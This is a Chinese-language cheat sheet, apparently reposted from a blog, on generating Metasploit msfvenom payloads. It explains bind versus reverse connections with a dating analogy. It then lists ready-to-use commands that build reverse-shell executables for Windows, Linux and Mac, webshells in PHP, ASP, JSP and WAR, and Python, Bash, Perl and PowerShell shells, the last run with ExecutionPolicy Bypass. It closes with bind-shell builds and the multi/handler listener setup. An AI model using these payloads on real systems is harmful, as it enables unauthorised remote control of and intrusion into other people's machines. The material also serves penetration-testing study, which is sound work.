MSF常用payload生成


兩種方式

msf生成的payload分為正向和反向兩種,正向需要正向連接,反向需要反向連接,反向是最常用的方式

正向連接指被攻擊的目標機器通過正向的payload打開一個端口,攻擊者的機器去連接目標機器的這個端口,從而建立連接
如果把攻擊機器比喻成你,目標機器比喻成妹子,正向連接相當於你去追追妹子,最后建立了連接,兩者可以互相通信

反向指攻擊者的機器打開一個端口,目標機器運行反向payload來連接攻擊機器的端口,從而建立連接
用上面的比喻,反向連接相當於妹子來追你,最后建立了連接,相互通信

使用場景

反向是比較常用的方式,在內網滲透中會使用到正向

如果目標機器能夠出站與你的機器建立連接就可以使用正向,相當於你和妹子在一家公司上班,妹子可以主動找你,最后在一起了

如果⽬標處於深層⽹絡,不能直接連通外⽹,也不能通過其他機器連通則可以使用正向,相當於妹子在家里宅着天天不出門,你為了追到手,只有去他家拜訪一下

反向連接比正向連接更加穩定

常用反向payload生成

生成二進制文件

  • Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
  • Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
  • Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

生成Webshell腳本

  • PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
  • ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
  • JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
  • War
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

生成其他shell腳本

  • Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
  • Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
  • Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
  • Powershell
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<Your IP Address> LPORT= <Your Port to Connect On> -f psh > shell.ps1 powershell.exe -ExecutionPolicy Bypass -File shell.ps1

常用正向payload生成

和反向有些相似

  • 32位Windows
msfvenom -p windows/meterpreter/bind_tcp  LPORT=<Attack Port> -f exe >/root/bind_xx.exe 
  • 64位Windows
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=<Attack Port> -f exe >/root/bind_xx.exe

其他版本的payload生成以此類推

MSF接收

反向

msfconsole 
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp       # 這里替換為生成使用的payload
set LHOST your-ip    # msf所在機器的ip
set LPORT your-port              # 連接的端口
exploit

正向

msfconsole
use exploit/multi/handler set PAYLOAD windows/meterpreter/bind_tcp          # 這里替換為生成使用的payload
set RHOST victim-ip       # 目標機器的ip
exploit

注意

注意目標機器系統是32位還是64位
生成的payload都需要在目標機器上成功運行才能夠連接


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM